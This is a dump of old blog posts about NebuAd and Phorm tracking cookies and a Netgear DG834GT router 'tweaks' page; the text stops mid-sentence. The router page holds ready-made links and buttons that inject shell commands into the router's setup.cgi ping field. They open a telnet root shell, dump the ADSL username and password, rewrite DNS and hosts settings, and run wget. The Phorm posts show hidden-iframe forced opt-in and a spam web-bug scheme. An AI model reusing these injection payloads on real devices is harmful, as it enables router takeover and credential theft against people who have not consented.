Surprisingly, the opt-in /opt-out pages are indexed by google: <a href="http://www.google.co.uk/search?num=100&hl=en&q=site%3Anebuad.com+optin&meta=" rel="nofollow">http://www.google.co.uk/search?num=100&hl=en&q=site%3Anebuad.com+optin&meta=</a>. <br />
<br />
The above search no longer works try <a href="http://www.google.co.uk/search?num=100&hl=en&q=site%3Anebuad.com+optout+OR+optin_done&btnG=Search&meta=" rel="nofollow">http://www.google.co.uk/search?num=100&hl=en&q=site%3Anebuad.com+optout+OR+optin_done&btnG=Search&meta=</a>. <br />
<br />
Also cookie "h" is no longer set. <br />
<br />
WARNING: if your ISP uses Nebuad and you've already opted-out, then opening the second search result shown in google (www.nebuad.com/privacy/optin_done.php) will almost certainly opt you back in. <br />
<br />
WARNING: I've just noticed that Firefox has a page pre-fetch feature which might result in the opt-in page being accessed and the cookie changed just by clicking on the google search above (depends on which link appears first I think)- if you click on the link above, please make sure you opt-out afterwards.<br />
<br />
Nebuad's opt-in/opt page can be found here:- www.nebuad.com/company/optout.php <br />
<br />
Opting in creates 2 sets of 5 cookies, "o","u","c","h","w", one set in "a.faireagle.com", and the other in the "b.faireagle.com" subdomain. Opting out sets "o"="9" and deletes the other cookies.<br />
<br />
o = 0 appears to indicate opted in.<br />
o = 9 indicates opted out.<br />
<br />
My guess is "o" might be a set of binary flags eg <br />
<br />
bit #0 = 1 - don't track<br />
bit #3 = 1 - don't show targetted adverts. <br />
<br />
'c' is the name of an adserver.<br />
'h' and 'u' are set to matching 14 digit numbers.<br />
'w' is another 14 digit number, which appears to count upwards (could be a date and time perhaps?).<br />
<br />
Different sets of numbers are generated for the a and b subdomains.<br />
<br />
If you look at the bottom of the opt-in page you'll see the actual opt-in urls passed using a couple of <script> tags right at the very bottom after the closing html tag, the browser will request these urls and the server will set the cookies in the response and close the connection (no actual javascript is returned by the response). <br />
<br />
<script language="JavaScript" src="http://a.faireagle.com/a?t=o&track=yes&noads=none"></script><br />
<script language="JavaScript" src="http://b.faireagle.com/a?t=o&track=yes&noads=none"></script><br />
<br />
<br />
And for the opt-out page.<br />
<br />
<script language="JavaScript" src="http://a.faireagle.com/a?t=o&track=no&noads=all"></script><br />
<script language="JavaScript" src="http://b.faireagle.com/a?t=o&track=no&noads=all"></script> <br />
<br />
There does not appear to be any measures in place to prevent an "evil" website from opting you back-in using the same method - try clicking on Google's cached optin_done link and check for faireagle.com cookies.Unknownnoreply@blogger.com2tag:blogger.com,1999:blog-5979318544872859116.post-53708810999238239712008-04-24T16:43:00.021+00:002010-10-01T15:35:08.112+00:00Phorm Webwise diagram<table style="width:auto;"><tr><td><a href="http://picasaweb.google.com/lh/photo/lKMJ-FRw3JYUG5NrglcmTHS4SMg-O4-x5LQImWudb1A?feat=embedwebsite"><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqiX2S6cvymjdM1U0xXJYq0COivHzFKBaszkI5afVEEnIoFx2E6Zdz7YOJgt2TElW5V68F_ndQtrlhbRzq2Z9pLi9RU2CCwyGXDcBNS51dYxY1fQLuh7f8B4aRZOjiQuMCEbuu0fSU7zA/s400/phorming.png" height="329" width="400" /></a></td></tr><tr><td style="font-family:arial,sans-serif; font-size:11px; text-align:right"></td></tr></table>
A diagram showing how Phorm's system creates copies of its tracking cookie in each domain the brower fetches, based on the analysis published by Richard Clayton <a href="http://www.lightbluetouchpaper.org/2008/04/04/the-phorm-webwise-system/">The Phorm Webwise System</a>
<BR><BR> Phorm's system will intercept requests that don't contain their "webwise" tracking cookie and send them through a series of redirects to access and transfer the unique identity number they allocate to you from your webwise.net master cookie to a tracking cookie they'll create for each site you visit.
<BR><BR>
This cookie will expire after three days, until then your browser will send this cookie with future requests for the site and their system will strip the cookie from each request and use it to identify your profile as it analyses your http traffic - including the search parameters you enter into major search engines, and the content of the pages you view.<BR><BR>
Dr Richard Clayton has updated his paper on Phorm webwise, after Phorm managed to recall more of the detail of their system <a href="http://www.lightbluetouchpaper.org/2008/05/18/twisty-little-passages-all-alike/">twisty-little-passages-all-alike</a>.
<BR><BR>It now seem that an additonal redirect will occur if a webwise.net cookie isn't present to determine if the user is blocking webwise.net cookies, in which case the user's IP address will be blacklisted for 30 minutes to avoid infinite loops.<BR><BR>
It seems logical to me that they would use a similar approach to determine if the user is blocking cookies for the actual site he is visiting, either by setting a test cookie with the first redirect if no cookies are present in the initial request, or by using an additional redirect.<BR><BR>
A poster on <a href="http://www.badphorm.co.uk/e107_plugins/forum/forum_viewtopic.php?2989.30">Badphorm</a> has pointed out that because phorm's system redirects the browser to a third party domain (webwise.net), the webwise.net cookie is in fact a third party cookie.
<BR><BR>
As reported in that thread Opera will correctly (according to rfc2965) block (neither send not accept) all cookies after a redirect to a third party domain occurs if the "accept only cookies from the site I visit" option has been enabled by the user. It will continue to block cookies until a user action occurs where the user can verify the domain requested -such as clicking on a link on the page (even if subsequently redirected back to the original URL).<BR><BR> This will also result in the genuine website not being sent its cookies after a Phorm redirect, which will cause problems for users of Opera that block third party cookies.<BR><BR>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-5979318544872859116.post-1127032963427689432008-04-20T21:43:00.042+00:002011-10-15T16:26:39.424+00:00Sky Netgear DG834GT-1skukThese "tweaks" are currently only compatible with Firefox and Internet Explorer, unless otherwise indicated. <br />
<br />
<div id="SKUKdg834gt"><input id="SKUKipad" size="15" type="text" value="192.168.0.1" /><br />
<input onclick="SKUKadd2url();" type="button" value="change ip" /> <br />
<br />
<br />
<input onclick="statsURL="http://192.168.0.1/setup.cgi?PATH=/bin:/sbin:/usr/bin:/usr/sbin;ifconfig;adslctl+info+--SNR;adslctl+info+--Hlog;echo+\\042\\\\074/textarea\\\\076\\\\074br\\\\076\\\\074textarea+rows=120+cols=140\\\\076\\042;ifconfig+ppp0;echo+Uptime+$(cat+/proc/uptime);echo+Wan+up+$(cat+/tmp/wan_uptime);adslctl+info+--stats;adslctl+info+--vendor|grep+Chip;rm+$0&todo=ping_test&next_file=diagping.htm&c4_IPAddr=127.0.0.1>/dev/null;(IFS=%2b;/bin/echo%3E/tmp/mel+${QUERY_STRING%25%25%26to*};/bin/sh+/tmp/mel)+>%261+2>%261;";window.open(statsURL);" type="button" value="DG834GT Detailed Stats" /><br />
<br />
<br />
<a href="http://192.168.0.1/setup.cgi?PATH=/bin:/sbin:/usr/bin:/usr/sbin;ifconfig+ppp0;adslctl+info+--stats;rm+$0&todo=ping_test&next_file=diagping.htm&c4_IPAddr=127.0.0.1%3E/dev/null;(IFS=%2b;/bin/echo%3E/tmp/mel+${QUERY_STRING%25%25%26to*};/bin/sh+/tmp/mel)+%3E%261+2%3E%261;" id="SKUKstats2" rel="nofollow" target="_blank">DG834GT Detailed Stats </a> alternate version. (This version should also work in Opera and Safari) <br />
<br />
<br />
<br />
<table border="0" cellpadding="1" cellspacing="0" style="border-color: white; border-width: 1; border: solid;"><tbody>
<tr style="height: 117.35pt;"> <td style="background-color: black; border-color: grey; border-left: solid; border-width: 1; border: none; font-size: 10pt; height: 117.35pt; padding: 0pt 5pt 0pt 5pt; width: 20pt;"><div class="Section1"><span style="color: white;"> </span><br />
<table border="0" cellpadding="0" cellspacing="0" class="zeroBorder" style="margin-left: 0pt; width: 518pt;"><tbody>
<tr> <td style="vertical-align: top;"><span style="font-family: "Times New Roman";"><span style="font-size: x-small;">SF:</span></span> </td> <td style="vertical-align: top;"><span style="font-family: "Times New Roman";"><span style="font-size: x-small;">Super Frame count</span></span> </td> <td style="vertical-align: top;"><span style="font-family: "Times New Roman";"><span style="font-size: x-small;"> </span></span> </td> <td style="vertical-align: top;"><span style="font-family: "Times New Roman";"><span style="font-size: x-small;"><b>G.dmt framing</b></span></span> </td> </tr>
<tr> <td style="vertical-align: top;"><span style="font-family: "Times New Roman";"><span style="font-size: x-small;">CRC:</span></span> </td> <td style="vertical-align: top;"><span style="font-family: "Times New Roman";"><span style="font-size: x-small;">CRC error count</span></span> </td> <td style="vertical-align: top;"><span style="font-family: "Times New Roman";"><span style="font-size: x-small;">K:</span></span> </td> <td style="vertical-align: top;"><span style="font-family: "Times New Roman";"><span style="font-size: x-small;">No. of data bytes in DMT frame</span></span> </td> </tr>
<tr> <td style="vertical-align: top;"><span style="font-family: "Times New Roman";"><span style="font-size: x-small;">ES:</span></span> </td> <td style="vertical-align: top;"><span style="font-family: "Times New Roman";"><span style="font-size: x-small;">Errored Seconds (Seconds with 1 or more CRC errors)</span></span> </td> <td style="vertical-align: top;">R: </td> <td style="vertical-align: top;"><span style="font-family: "Times New Roman";"><span style="font-size: x-small;">No. of redundant (parity) bytes per Reed Solomon codeword</span></span> </td> </tr>
<tr> <td style="vertical-align: top;"><span style="font-family: "Times New Roman";"><span style="font-size: x-small;">SES:</span></span> </td> <td style="vertical-align: top;"><span style="font-family: "Times New Roman";"><span style="font-size: x-small;">Severely Errored Seconds </span></span> </td> <td style="vertical-align: top;"><span style="font-family: "Times New Roman";"><span style="font-size: x-small;">S:</span></span> </td> <td style="vertical-align: top;"><span style="font-family: "Times New Roman";"><span style="font-size: x-small;">No. of data frames per RS codeword</span></span> </td> </tr>
<tr> <td style="vertical-align: top;"><span style="font-family: "Times New Roman";"><span style="font-size: x-small;">RS:</span></span> </td> <td style="vertical-align: top;"><span style="font-family: "Times New Roman";"><span style="font-size: x-small;">Reed Solomon codewords (FEC Data Frames)</span></span> </td> <td style="vertical-align: top;"><span style="font-family: "Times New Roman";"><span style="font-size: x-small;">D:</span></span> </td> <td style="vertical-align: top;"><span style="font-family: "Times New Roman";"><span style="font-size: x-small;">Interleave depth</span></span> </td> </tr>
<tr> <td style="vertical-align: top;"><span style="font-family: "Times New Roman";"><span style="font-size: x-small;">RSCorr:</span></span> </td> <td style="vertical-align: top;"><span style="font-family: "Times New Roman";"><span style="font-size: x-small;">RS Correctable errors (aka FEC)</span></span> </td> <td style="vertical-align: top;"></td> <td style="vertical-align: top;"></td> </tr>
<tr> <td style="vertical-align: top;"><span style="font-family: "Times New Roman";"><span style="font-size: x-small;">RSUnCorr:</span></span> </td> <td style="vertical-align: top;"><span style="font-family: "Times New Roman";"><span style="font-size: x-small;">RS Uncorrectable errors</span></span> </td> <td style="vertical-align: top;"><span style="font-family: "Times New Roman";"><span style="font-size: x-small;"> </span></span> </td> <td style="vertical-align: top;"><span style="font-family: "Times New Roman";"><span style="font-size: x-small;"> </span></span><span style="font-family: "Times New Roman";"><span style="font-size: x-small;"><b>ADSL2 framing</b></span></span> </td> </tr>
<tr> <td style="vertical-align: top;"><span style="font-family: "Times New Roman";"><span style="font-size: x-small;">LOF:</span></span> </td> <td style="vertical-align: top;"><span style="font-family: "Times New Roman";"><span style="font-size: x-small;">Loss Of Framing</span></span> </td> <td style="vertical-align: top;"><span style="font-family: "Times New Roman";"><span style="font-size: x-small;">MSGc:</span></span> </td> <td style="vertical-align: top;"><span style="font-family: "Times New Roman";"><span style="font-size: x-small;">No. of bytes in overhead channel message</span></span> </td> </tr>
<tr> <td style="vertical-align: top;"><span style="font-family: "Times New Roman";"><span style="font-size: x-small;">Delay:</span></span> </td> <td style="vertical-align: top;"><span style="font-family: "Times New Roman";"><span style="font-size: x-small;">delay due to interleaving (milliseconds)</span></span> </td> <td style="vertical-align: top;"><span style="font-family: "Times New Roman";"><span style="font-size: x-small;">B:</span></span> </td> <td style="vertical-align: top;"><span style="font-family: "Times New Roman";"><span style="font-size: x-small;">No. of bytes in Mux Data Frame</span></span> </td> </tr>
<tr> <td style="vertical-align: top;"><span style="font-family: "Times New Roman";"><span style="font-size: x-small;">INP:</span></span> </td> <td style="vertical-align: top;"><span style="font-family: "Times New Roman";"><span style="font-size: x-small;">Impulse Noise Protection (milliseconds)</span></span> </td> <td style="vertical-align: top;"><span style="font-family: "Times New Roman";"><span style="font-size: x-small;">M:</span></span> </td> <td style="vertical-align: top;"><span style="font-family: "Times New Roman";"><span style="font-size: x-small;">No. of Mux Data Frames per Reed Solomon codeword</span></span> </td> </tr>
<tr> <td style="vertical-align: top;"><span style="font-family: "Times New Roman";"><span style="font-size: x-small;">PER:</span></span> </td> <td style="vertical-align: top;"><span style="font-family: "Times New Roman";"><span style="font-size: x-small;">Overhead channel period (msec)</span></span> </td> <td style="vertical-align: top;"><span style="font-family: "Times New Roman";"><span style="font-size: x-small;">T:</span></span> </td> <td style="vertical-align: top;"><span style="font-family: "Times New Roman";"><span style="font-size: x-small;">No. of Mux Data Frames proceeding a synchronization byte</span></span> </td> </tr>
<tr> <td style="vertical-align: top;"><span style="font-family: "Times New Roman";"><span style="font-size: x-small;">OR:</span></span> </td> <td style="vertical-align: top;"><span style="font-family: "Times New Roman";"><span style="font-size: x-small;">Bit rate of the overhead channel</span></span> </td> <td style="vertical-align: top;"><span style="font-family: "Times New Roman";"><span style="font-size: x-small;">R:</span></span> </td> <td style="vertical-align: top;"><span style="font-family: "Times New Roman";"><span style="font-size: x-small;">No. of redundant (parity) bytes per Reed Solomon codeword </span></span> </td> </tr>
<tr> <td style="vertical-align: top;"><span style="font-family: "Times New Roman";"><span style="font-size: x-small;">HEC:</span></span> </td> <td style="vertical-align: top;"><span style="font-family: "Times New Roman";"><span style="font-size: x-small;">ATM checksum header error count</span></span> </td> <td style="vertical-align: top;"><span style="font-family: "Times New Roman";"><span style="font-size: x-small;">S:</span></span> </td> <td style="vertical-align: top;"><span style="font-family: "Times New Roman";"><span style="font-size: x-small;">Ratio of RS codeword over PMD Data Frame length</span></span> </td> </tr>
<tr> <td style="vertical-align: top;"><span style="font-family: "Times New Roman";"><span style="font-size: x-small;">LOS:</span></span> </td> <td style="vertical-align: top;"><span style="font-family: "Times New Roman";"><span style="font-size: x-small;">Loss Of Signal</span></span> </td> <td style="vertical-align: top;"><span style="font-family: "Times New Roman";"><span style="font-size: x-small;">L:</span></span> </td> <td style="vertical-align: top;"><span style="font-family: "Times New Roman";"><span style="font-size: x-small;">No. of bits in PMD Data Frame</span></span> </td> </tr>
<tr align="left"> <td style="vertical-align: top;"><span style="font-family: "Times New Roman";"><span style="font-size: x-small;">UAS:</span></span> </td> <td style="vertical-align: top;"><span style="font-family: "Times New Roman";"><span style="font-size: x-small;">Unavailable Seconds (No Signal)</span></span> </td> <td style="vertical-align: top;"><span style="font-family: "Times New Roman";"><span style="font-size: x-small;">D:</span></span> </td> <td style="vertical-align: top;"><span style="font-family: "Times New Roman";"><span style="font-size: x-small;">Interleave depth</span></span> </td> </tr>
</tbody> </table><span style="font-family: "Times New Roman";"><span style="font-size: small;"> </span></span> </div></td> </tr>
</tbody></table><br />
<br />
<br />
<a href="http://192.168.0.1/setup.cgi?todo=ping_test&next_file=start.htm&c4_IPAddr=127.0.0.1;PATH=/bin:/sbin:/usr/bin:/usr/sbin;unset+QUERY_STRING;sh+-c+%22utelnetd+-d+-l+/bin/sh+%3e/dev/null+2%3e/dev/null+%22%26" rel="nofollow" target="_blank">Enable telnet</a> <a href="telnet://192.168.0.1/" rel="nofollow">Open telnet console</a> to disable type "killall utelnetd" in the console. (Enable telnet should also work in Opera and Safari) <br />
<br />
<a href="http://192.168.0.1/setup.cgi?PATH=/bin:/sbin:/usr/bin:/usr/sbin;eval+$(nvram+get+pppoa_username);echo+Username+=+${name%25=};eval+$(nvram+get+pppoa_password);echo+Password+=+${name%25=};rm+$0&todo=ping_test&next_file=diagping.htm&c4_IPAddr=127.0.0.1%3E/dev/null;(IFS=%2b;/bin/echo%3E/tmp/mel+${QUERY_STRING%25%25%26to*};/bin/sh+/tmp/mel)+%3E%261+2%3E%261;" rel="nofollow" target="_blank">Extract ADSL Password and Username</a> (Should work in Opera) <br />
<br />
<a href="http://192.168.0.1/setup.cgi?todo=ppp_debug" rel="nofollow" target="_blank">PPP debug mode</a> logs PPP authentication attempts and LCP echo requests. Note this will cause your PPP connection to drop and reconnect. The PPP log can get very large if you leave it enabled. <br />
<br />
<a href="http://192.168.0.1/ppp_log" rel="nofollow" target="_blank">View PPP log file</a> (note that the PPP log contains your username and a hash of your password)<br />
<br />
<a href="http://192.168.0.1/setup.cgi?todo=ping_test&next_file=start.htm&c4_IPAddr=127.0.0.1;PATH=/bin:/sbin:/usr/bin:/usr/sbin;rm+/tmp/ppp_log" rel="nofollow" target="_blank">Delete PPP log file</a> and cease PPP logging<br />
<br />
<hr /><h4>Target Noise Margin</h4><br />
Override Target Noise Margin <input id="SKUKgtsnr2" onchange=";document.getElementById('SKUKgtsnrb2').disabled=isNaN(this.value);" size="3" type="text" value="100" />% of default target margin <input id="SKUKgtsnrb2" onclick="window.open('http://192.168.0.1/setup.cgi?todo=ping_test&next_file=diagping.htm&c4_IPAddr=127.0.0.1>/dev/null;PATH=/usr/sbin;adslctl+configure+'+((document.getElementById('SKUKgtgdmt').checked)?'--mod+d+':'')+'--snr+XXX+>%261+2>%261;'.replace(/XXX/gm,document.getElementById('SKUKgtsnr2').value));SKUKadd2url();" type="button" value="adjust Margin & ReSync" /> <span style="font-size: xx-small;"> 86%=6dB, 100%=7dB(default), 114%= 8db, 180%=12.6db...</span> (also works in Opera)<br />
<br />
<input id="SKUKgtgdmt" type="checkbox" /> Force G.DMT (ADSL1)<br />
<br />
<br />
<hr /><h4>Connection Table (ip_conntrack)</h4><input onclick="window.open("http://192.168.0.1/setup.cgi?PATH=/bin:/sbin:/usr/bin:/usr/sbin;echo+\\042\\\\074/textarea\\\\076\\\\074br\\\\076\\\\074textarea+rows=120+cols=140\\\\076\\042;cat+/proc/net/ip_conntrack;rm+$0&todo=ping_test&next_file=diagping.htm&c4_IPAddr=127.0.0.1>/dev/null;(IFS=%2b;/bin/echo%3E/tmp/mel+${QUERY_STRING%25%25%26to*};/bin/sh+/tmp/mel)+>%261+2>%261;");" type="button" value="Show connections" /> <input onclick="window.open("http://192.168.0.1/setup.cgi?PATH=/bin:/sbin:/usr/bin:/usr/sbin;echo+\\042\\\\074/textarea\\\\076\\\\074br\\\\076\\\\074textarea+rows=120+cols=140\\\\076\\042;grep+-v+TIME_WAIT+/proc/net/ip_conntrack;rm+$0&todo=ping_test&next_file=diagping.htm&c4_IPAddr=127.0.0.1>/dev/null;(IFS=%2b;/bin/echo%3E/tmp/mel+${QUERY_STRING%25%25%26to*};/bin/sh+/tmp/mel)+>%261+2>%261;");" type="button" value="Connections excluding TIME_WAIT" /> <br />
<hr /><h4>DNS Settings</h4><input disabled="" id="SKUKdns1" size="15" type="text" value="90.207.238.99" /> <input disabled="" id="SKUKdns2" size="15" type="text" value="90.207.238.97" /> <input disabled="" id="dis3" onclick="window.open("http://192.168.0.1/setup.cgi?PATH=/bin:/usr/sbin;nvram+set+wan_dns1=%DNS1%;nvram+set+wan_dns2=%DNS2%;nvram+set+wan_fix_dns=1;rm+$0&todo=ping_test&next_file=diagping.htm&c4_IPAddr=127.0.0.1>/dev/null;(IFS=%2b;/bin/echo%3E/tmp/mel+${QUERY_STRING%25%25%26to*};/bin/sh+/tmp/mel)+>%261+2>%261;".replace(/%DNS1%/gm,document.getElementById("SKUKdns1").value).replace(/%DNS2%/gm,document.getElementById("SKUKdns2").value))" type="button" value="Use these name servers" /> <br />
<br />
<input disabled="" id="dis4" onclick="window.open("http://192.168.0.1/setup.cgi?PATH=/bin:/usr/sbin;nvram+set+wan_dns1=;nvram+set+wan_dns2=;nvram+set+wan_fix_dns=0;rm+$0&todo=ping_test&next_file=diagping.htm&c4_IPAddr=127.0.0.1>/dev/null;(IFS=%2b;/bin/echo%3E/tmp/mel+${QUERY_STRING%25%25%26to*};/bin/sh+/tmp/mel)+>%261+2>%261;")" type="button" value="Use ISP allocated Domain Name Servers (default)" /> <br />
<br />
Reboot the Router, or restart the PPP connection for DNS changes to take effect. If you input invalid DNS servers, you will be unable to access the internet - to restore the original setting click the "use ISP allocated Domain Name Servers (default)" button above. This change can also be cleared by resetting the router to factory settings using the reset button in the back<br />
<br />
<br />
This page must be downloaded and opened locally for these options to be enabled. <br />
<hr /><h4>Add entries to router's hosts file</h4><br />
These settings are not particularily useful unless your connection is 100% stable as the Netgear's host file & its dns server will be reset every time the PPP connection is re-established after a drop. <br />
<br />
Enter IP address <space> hostname (eg. 192.168.0.10 mel.lan)<br />
<br />
<textarea cols="29" id="SKUKdnsgtG" language="javascript" name="SKUKdnsgtGN" rows="9" style="height: 187px; width: 278px;">192.168.0.</textarea><br />
<br />
<input onclick="var hostsURL="http://192.168.0.1/setup.cgi?PATH=/bin:/sbin:/usr/bin:/usr/sbin;cp+/proc/\\0140cat+/var/run/dnrd.pid\\0140/cmdline+/tmp/me;rc+dnrd+stop;echo+$DNRD\\076\\076/etc/hosts;\\0140grep+.+/tmp/me\\0140;rm+$0&todo=ping_test&next_file=diagping.htm&c4_IPAddr=127.0.0.1>/dev/null;(IFS=%2b;/bin/echo%3E/tmp/mel+${QUERY_STRING%25%25%26to*};/bin/sh+/tmp/mel)+>%261+2>%261;";var a=document.getElementById("SKUKdnsgtG").value.replace(/\r?\n/igm,"\\n").replace(/ /gm,"+");window.open(hostsURL.replace(/\$DNRD/,a));" type="button" value="Add above to router's hosts file" /> <br />
<br />
<input id="SKUK2dns1" size="15" type="text" value="90.207.238.99" /> <input id="SKUK2dns2" size="15" type="text" value="90.207.238.97" /> <input onclick="var hostsURL="http://192.168.0.1/setup.cgi?PATH=/bin:/sbin:/usr/bin:/usr/sbin;rc+dnrd+stop;dnrd+-a+192.168.0.1+-m+hosts+-c+off+--timeout=0+-b+-s+%DNS1%+-s+%DNS2%;rm+$0&todo=ping_test&next_file=diagping.htm&c4_IPAddr=127.0.0.1>/dev/null;(IFS=%2b;/bin/echo%3E/tmp/mel+${QUERY_STRING%25%25%26to*};/bin/sh+/tmp/mel)+>%261+2>%261;".replace(/%DNS1%/gm,document.getElementById("SKUK2dns1").value).replace(/%DNS2%/gm,document.getElementById("SKUK2dns2").value);var a=document.getElementById("SKUKdnsgtG").value.replace(/\r?\n/igm,"\\n").replace(/ /gm,"+");window.open(hostsURL.replace(/\$DNRD/,a));" type="button" value="Use These Name Servers" /> (doesn't survive connection drop or reboot) <br />
<br />
<a href="http://192.168.0.1/setup.cgi?todo=ping_test&next_file=diagping.htm&c4_IPAddr=127.0.0.1;PATH=$PATH:/bin:/usr/sbin;rc+dnrd+restart+%3e%261+2%3e%261;" rel="nofollow" target="_blank">Reset DNS Server</a> <span id="SKUKwhat"></span> <br />
<br />
<hr /><h4>Router based "speed test"</h4><br />
If you think poor speeds are caused by your PC or wireless link - This will download a file to the router and time the download (if this test fails to work choose a download file with a shorter URL) Results are only a very rough estimate. <br />
<br />
Input the URL of a file to download and its filesize (url must be quite short).<br />
<br />
Please be patient, the page will only open once the file download has completed. <br />
<br />
Download url <input id="SKUKstfile" size="60" type="text" val2="largedownload.me 15672228" value="http://static.btopenworld.com/broadband/adhoc_pages/speedtest/files/smalldownload.me" /> <br />
<br />
Filesize <input id="SKUKstfilesize" type="text" value="5716212" /><select id="SKUKbkmg"><option value="128">Bytes</option><option value="0.125">Kilobytes</option><option value="0.0001220703">Megabytes</option></select> <br />
<br />
<input onclick="testurl='http://192.168.0.1/setup.cgi?PATH=/bin:/sbin:/usr/bin:/usr/sbin;(S=$(cat+/proc/uptime);wget+-nv+%FILE%+-O+/dev/null;E=$(cat+/proc/uptime);echo+Speed=$((%SIZE%/$((${E%%.*}-${S%%.*}))))+Kbps);rm+$0&todo=ping_test&next_file=diagping.htm&c4_IPAddr=127.0.0.1>/dev/null;(IFS=%2b;/bin/echo%3E/tmp/mel+${QUERY_STRING%25%25%26t*};/bin/sh+/tmp/mel)%3e%261+2%3e%261'.replace(/%FILE%/,document.getElementById('SKUKstfile').value).replace(/%SIZE%/,Math.round(document.getElementById('SKUKstfilesize').value/document.getElementById('SKUKbkmg').options[document.getElementById('SKUKbkmg').options.selectedIndex].value));window.open(testurl);" type="button" value=" Run Speedtest " /> (also works in Opera) <br />
<br />
<br />
Alternative test: Downloads and displays the start and end times so that you can calculate the speed more accurately<br />
<br />
Download url <input id="SKUKstfile2" size="60" type="text" value="http://static.btopenworld.com/broadband/adhoc_pages/speedtest/files/smalldownload.me" /> <input onclick="var testurl='http://192.168.0.1/setup.cgi?PATH=/bin:/sbin:/usr/bin:/usr/sbin;(S=$(cat+/proc/uptime);wget+%FILE%+-O+/dev/null;E=$(cat+/proc/uptime);echo+end=${E%%+*};echo+start=${S%%+*});rm+$0&todo=ping_test&next_file=diagping.htm&c4_IPAddr=127.0.0.1>/dev/null;(IFS=%2b;/bin/echo%3E/tmp/mel+${QUERY_STRING%25%25%26t*};/bin/sh+/tmp/mel)%3e%261+2%3e%261'.replace(/%FILE%/,document.getElementById('SKUKstfile2').value);window.open(testurl);" type="button" value="test" /> {44668/(end-start) Kbps}<br />
<br />
<input onclick="SKUKadd2url();" type="button" value="-" /> <br />
<br />
</div><br />
<script>
function SKUKadd2url(){
var l=location.pathname + '?host='+ document.getElementById('SKUKdnsgtG').value.replace(/\r?\n/igm,'/n').replace(/ /gm,'+')+ '&snr=' + document.getElementById('SKUKgtsnr2').value+ '&url=' +document.getElementById('SKUKipad').value;
location.href=l;
}
function SKUKurl2html(){
var a=location.search.match(/url=(.*?)(?=%26|&|$)/im);if (a!=null && a[1]!=null) {var ip=a[1];
var r = new RegExp('://[1]92.168.0.1/','gm');
document.getElementById('SKUKdg834gt').innerHTML=document.getElementById('SKUKdg834gt').innerHTML.replace(r,'://'+ip+'/');
document.getElementById('SKUKipad').value=ip;
}
var a=location.search.match(/host=(.*?)(?=%26|&|$)/im);if (a!=null && a[1]!=null) {var x=a[1];
document.getElementById('SKUKdnsgtG').value=x.replace(/\/n/igm,'\n').replace(/\+|%20/igm,' ')
};
var a=location.search.match(/SNR=(.*?)(?=%26|&|$)/im);if (a!=null && a[1]!=null) {var x=a[1];
document.getElementById('SKUKgtsnr2').value=x.replace(/\/n/igm,'\n').replace(/\+|%20/igm,' ')
};
var a=location.search.match(/DNS(?=%26|&|$)/im);if (a!=null || location.protocol =="file:") {
document.getElementById('SKUKdns1').disabled=false;document.getElementById('SKUKdns2').disabled=false;document.getElementById('dis3').disabled=false;document.getElementById('dis4').disabled=false;
}
}
window.onload= SKUKurl2html;
</script>Unknownnoreply@blogger.com18tag:blogger.com,1999:blog-5979318544872859116.post-63736996862823740162008-04-17T11:42:00.003+00:002008-05-05T23:57:20.842+00:00WebWise? Phorming An Opinion<DIV><STRONG>Are cookies a wise way to handle an opt-out?</STRONG> <HR style="COLOR: #d1d1e1" SIZE=1> <DIV> </DIV></DIV> <DIV>I happened to see <A href="http://groups.google.com/group/news.admin.net-abuse.email/browse_thread/thread/48e62939e58b079b" target=_blank>this javascript</A> about a month ago and almost immediately noticed a potential problem with the way the opt-in works. As the issue would be blinding obvious to anyone with a minimal knowledge of web design and security, and the system isn't live, and the issue does not represent a security risk, and because the difference in opting in or out is questionable, I <A href="http://www.ispreview.co.uk/talk/showthread.php?t=26644" target=_blank>posted about it in a forum</A> that was being frequented by PhormUKTechTeam at the time.</DIV> <DIV> </DIV> <DIV>Contained within this javascript is the URL to enable or disable webwise, which is called with a single parameter which requests either an opt-in cookie with an unique ID, or an opt-out cookie from the webwise.net server. It seemed fairly likely that just by embedding a hidden image or iframe on a webpage, it would be possible to remotely enable targeted advertising for visitors to that webpage from a "phorming" isp without their knowledge, let alone consent. </DIV> <DIV> </DIV> <DIV>All that would be required is an image tag with the source pointing to the opt-in URL, something like this:- </DIV> <DIV> </DIV> <DIV>"<img src="Webwise_opt_in_URL" width=1 height=1>" </DIV> <DIV> </DIV> <DIV>Now this opt-in method was no doubt "just a test" and I expect this will be fixed by the time Phorm's webwise system finally goes live, but for me it raises concerns about the quality of the design and coding.</DIV> <DIV><SPAN></SPAN> </DIV> <DIV>I don't expect it to work for long, but for the time being here are a couple of buttons to opt-in or out of webwise. They do nothing more than use javascript to open the opt-in or opt-out URL in a hidden iframe. Opting in will create a cookie in the a.webwise.net domain UID=xxxxxxxxxxxx|| where xxxxxxxxxxx is a 22 character (128 bit base64 encoded unique ID) and if present remove the webwise.net OPTED_OUT cookie (and vice versa). </DIV> <DIV> </DIV> <DIV><SPAN></SPAN><BR><iframe name=hidden_iframe FRAMEBORDER=0 SCROLLING=NO height=1 width=1 ></iframe><BR> <INPUT TYPE=button VALUE="Opt-in to Phorm" onClick="frames['hidden_iframe'].location.href='http://a.webwise.net/services/OO?op=in'"> <INPUT TYPE=button VALUE='"Opt-out" of phorm' onClick="frames['hidden_iframe'].location.href='http://a.webwise.net/services/OO?op=out'"> </DIV> <DIV> </DIV> <DIV> </DIV><DIV> </DIV> <DIV> </DIV> <DIV><STRONG>Leaking Webwise UID</STRONG> <HR style="COLOR: #d1d1e1" SIZE=1><br> <BR> Richard Clayton notes in point 24 of his analysis of <a href="http://www.cl.cam.ac.uk/~rnc1/080404phorm.pdf"> the Phorm "webwise" system</a> that the webwise UID of visitors to a website will be visible to that website if any subsequent accesses to it use "https" protocol (also see points 20 to 26). He also reports that the Layer 7 switch only inspects traffic on port 80, this would suggest that the webwise UID will also be visible to a website if it uses a port other than 80 for a subsequent access. <BR> <HR style="COLOR: #d1d1e1" SIZE=1><br> <DIV><STRONG>Linking email addresses to webwise UID by spamming?</STRONG> <HR style="COLOR: #d1d1e1" SIZE=1><br> <DIV>Do any modern email clients still share cookies with a browser? Hmm, I guess webmail services.<BR><BR>Only it occurred to me that by spamming everybody @a_phorming_isp.com with an html email that contained a webbug designed to capture the UID, it might be possible for a spammer to compile a database of UIDs linked to email addresses. <BR><BR> The webbug could be an http: image link containing the email address it was sent to (ie your email address) suitably encoded eg:- <BR><BR>"http://Spammer.con/phormbug_YourEmailAddressHere.jpg" <BR><BR> If you view the email, your email client would request the image.<BR><BR> Phorm would use its triple redirect jiggery-pokery to intercept this request and copy the webwise.net 